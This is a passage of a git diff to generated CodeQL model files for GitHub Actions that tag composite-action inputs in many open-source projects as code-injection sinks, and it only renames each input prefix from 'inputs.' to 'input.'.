\ No newline at end of file
+ - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"]
+ - ["rocketchat/rocket.chat", "*", "input.release", "code-injection", "generated"]
+ - ["rocketchat/rocket.chat", "*", "input.docker-tag", "code-injection", "generated"]
+ - ["rocketchat/rocket.chat", "*", "input.root-dir", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml
index 42aba6b02dd2..26d7b4482695 100644
--- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml
+++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rook/rook", "*", "inputs.use-tmate", "code-injection", "generated"] - - ["rook/rook", "*", "inputs.kubernetes-version", "code-injection", "generated"] - - ["rook/rook", "*", "inputs.additional-namespace", "code-injection", "generated"] - - ["rook/rook", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] + - ["rook/rook", "*", "input.kubernetes-version", "code-injection", "generated"] + - ["rook/rook", "*", "input.additional-namespace", "code-injection", "generated"] + - ["rook/rook", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 71d71f6cb21d..7600cd4bddeb 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["roots/trellis", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index 60a29d3edf7e..dd79b0845dd7 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ruby/debug", "*", "inputs.report-path", "code-injection", "generated"] \ No newline at end of file + - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 84d174e5a050..71bdd0014586 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ruby/ruby", "*", "inputs.builddir", "code-injection", "generated"] - - ["ruby/ruby", "*", "inputs.srcdir", "code-injection", "generated"] - - ["ruby/ruby", "*", "inputs.test-opts", "code-injection", "generated"] - - ["ruby/ruby", "*", "inputs.report-path", "code-injection", "generated"] - - ["ruby/ruby", "*", "inputs.launchable-token", "code-injection", "generated"] \ No newline at end of file + - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.srcdir", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.test-opts", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.report-path", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 5cc3a3a74750..3b3262f93a90 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] - - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] - - ["rusefi/rusefi", "*", "inputs.RUSEFI_OBFUSCATED_PUBLIC_SSH_USER", "code-injection", "generated"] - - ["rusefi/rusefi", "*", "inputs.sim_output", "code-injection", "generated"] - - ["rusefi/rusefi", "*", "inputs.RUSEFI_SSH_PASS", "code-injection", "generated"] \ No newline at end of file + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_USER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.sim_output", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_SSH_PASS", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index cee842ae1c6f..b30d898dcc17 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["saltstack/salt", "*", "inputs.version", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.upload-chunk-size", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.restore-keys", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.save-always", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.lookup-only", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.fail-on-cache-miss", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.enableCrossOsArchive", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.key", "code-injection", "generated"] - - ["saltstack/salt", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.upload-chunk-size", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.restore-keys", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.save-always", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.lookup-only", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.fail-on-cache-miss", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.enableCrossOsArchive", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.key", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index 535e832c1c32..979a9aca5c25 100644 --- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sap/sapmachine", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file + - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index e1902fb488fd..b180a319baaa 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["scala-native/scala-native", "*", "inputs.llvm-version", "code-injection", "generated"] - - ["scala-native/scala-native", "*", "inputs.scala-version", "code-injection", "generated"] \ No newline at end of file + - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] + - ["scala-native/scala-native", "*", "input.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index 2ede3df98649..fb5fa4d8e4e6 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["scitools/iris", "*", "inputs.version", "code-injection", "generated"] - - ["scitools/iris", "*", "inputs.install_packages", "code-injection", "generated"] - - ["scitools/iris", "*", "inputs.env_name", "code-injection", "generated"] \ No newline at end of file + - ["scitools/iris", "*", "input.version", "code-injection", "generated"] + - ["scitools/iris", "*", "input.install_packages", "code-injection", "generated"] + - ["scitools/iris", "*", "input.env_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index 1bea0aef9358..cb9faef2bf68 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["scylladb/scylla-operator", "*", "inputs.containerImageName", "code-injection", "generated"] - - ["scylladb/scylla-operator", "*", "inputs.githubToken", "code-injection", "generated"] - - ["scylladb/scylla-operator", "*", "inputs.githubRef", "code-injection", "generated"] - - ["scylladb/scylla-operator", "*", "inputs.githubRepository", "code-injection", "generated"] \ No newline at end of file + - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubToken", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubRef", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubRepository", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index 4a8bae9d2a1c..e7eb6b732ffb 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shader-slang/slang", "*", "inputs.platform", "code-injection", "generated"] - - ["shader-slang/slang", "*", "inputs.os", "code-injection", "generated"] - - ["shader-slang/slang", "*", "inputs.runs-on", "code-injection", "generated"] - - ["shader-slang/slang", "*", "inputs.config", "code-injection", "generated"] - - ["shader-slang/slang", "*", "inputs.compiler", "code-injection", "generated"] \ No newline at end of file + - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.os", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.runs-on", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.config", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index c63ed017ae17..a1b1a4b71e82 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shaka-project/shaka-player", "*", "inputs.state", "code-injection", "generated"] - - ["shaka-project/shaka-player", "*", "inputs.context", "code-injection", "generated"] - - ["shaka-project/shaka-player", "*", "inputs.job_name", "code-injection", "generated"] - - ["shaka-project/shaka-player", "*", "inputs.token", "code-injection", "generated"] \ No newline at end of file + - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.context", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.job_name", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index 544fc4b99516..2463b4a1d167 100644 --- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["shakacode/react-webpack-rails-tutorial", "*", "inputs.org", "code-injection", "generated"] - - ["shakacode/react-webpack-rails-tutorial", "*", "inputs.app_name", "code-injection", "generated"] \ No newline at end of file + - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] + - ["shakacode/react-webpack-rails-tutorial", "*", "input.app_name", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 2d3871a2231e..87e88b2c13d5 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["simple-icons/simple-icons", "*", "inputs.issue_number", "code-injection", "generated"] \ No newline at end of file + - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index 4f18723df389..c0789d6e4241 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["slint-ui/slint", "*", "inputs.extra-packages", "code-injection", "generated"] - - ["slint-ui/slint", "*", "inputs.binary", "code-injection", "generated"] \ No newline at end of file + - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] + - ["slint-ui/slint", "*", "input.binary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index a96d86c7b5ca..f617b9d172d5 100644 --- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["solidusio/solidus", "*", "inputs.last_minor", "code-injection", "generated"] - - ["solidusio/solidus", "*", "inputs.labels", "code-injection", "generated"] - - ["solidusio/solidus", "*", "inputs.base", "code-injection", "generated"] - - ["solidusio/solidus", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file + - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.labels", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.base", "code-injection", "generated"] + - ["solidusio/solidus", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index ff1b101be4ac..f30719d58d8f 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["solo-io/gloo", "*", "inputs.base-ref", "code-injection", "generated"] \ No newline at end of file + - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index fb7bdd0950ee..84d5c96e63b7 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sonarr/sonarr", "*", "inputs.filter", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.binary_path", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.artifact", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.version", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.major_version", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.branch", "code-injection", "generated"] - - ["sonarr/sonarr", "*", "inputs.framework", "code-injection", "generated"] \ No newline at end of file + - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.binary_path", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.artifact", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.major_version", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.branch", "code-injection", "generated"] + - ["sonarr/sonarr", "*", "input.framework", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index 9b263d03357c..d76ab136ab9c 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sonic-pi-net/sonic-pi", "*", "inputs.command", "code-injection", "generated"] - - ["sonic-pi-net/sonic-pi", "*", "inputs.container-version", "code-injection", "generated"] - - ["sonic-pi-net/sonic-pi", "*", "inputs.container", "code-injection", "generated"] \ No newline at end of file + - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "input.container-version", "code-injection", "generated"] + - ["sonic-pi-net/sonic-pi", "*", "input.container", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 5e6e66c4be4e..9e75660d1b3b 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spacedriveapp/spacedrive", "*", "inputs.setup-arg", "code-injection", "generated"] \ No newline at end of file + - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index cf545a955924..1cc6e837b840 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spockframework/spock", "*", "inputs.additional-java-version", "code-injection", "generated"] \ No newline at end of file + - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index 0484e9035153..b2e283c69830 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-io/initializr", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-io/initializr", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] + - ["spring-io/initializr", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index 756a1a0371ad..d08bdb5d6f44 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-io/start.spring.io", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-io/start.spring.io", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] + - ["spring-io/start.spring.io", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index ed954bf6f978..4532947bc485 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-projects/spring-boot", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-projects/spring-boot", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-boot", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index 47aebb458258..518a27d9afc5 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-projects/spring-framework", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-projects/spring-framework", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-framework", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index 28935d7a98bf..bb21bcda68de 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["spring-projects/spring-graphql", "*", "inputs.run-name", "code-injection", "generated"] - - ["spring-projects/spring-graphql", "*", "inputs.webhook-url", "code-injection", "generated"] \ No newline at end of file + - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] + - ["spring-projects/spring-graphql", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index 2ba9ff355e21..5f81d9bd4061 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["square/workflow-kotlin", "*", "inputs.commit-message", "code-injection", "generated"] - - ["square/workflow-kotlin", "*", "inputs.fix-task", "code-injection", "generated"] - - ["square/workflow-kotlin", "*", "inputs.personal-access-token", "code-injection", "generated"] \ No newline at end of file + - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "input.fix-task", "code-injection", "generated"] + - ["square/workflow-kotlin", "*", "input.personal-access-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index 530cc68ca4b3..f8fe2344d0a3 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["stefanprodan/podinfo", "*", "inputs.version", "code-injection", "generated"] - - ["stefanprodan/podinfo", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] + - ["stefanprodan/podinfo", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index e75197656f56..377e439049c8 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["stellar/go", "*", "inputs.go-version", "code-injection", "generated"] \ No newline at end of file + - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 21ea7ef13a98..1f087287d257 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["streetsidesoftware/cspell", "*", "inputs.name", "code-injection", "generated"] + - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index e6d2a79b8477..7f317ddad8e6 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["subquery/subql", "*", "inputs.package-path", "code-injection", "generated"] \ No newline at end of file + - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index ffd74df05e2c..b1a9ea20344f 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["swagger-api/swagger-codegen", "*", "inputs.options", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.spec-url", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.language", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.job-name", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.build-commands", "code-injection", "generated"] - - ["swagger-api/swagger-codegen", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.spec-url", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.language", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.job-name", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.build-commands", "code-injection", "generated"] + - ["swagger-api/swagger-codegen", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml index f476d7160f62..37e39efd2433 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml 
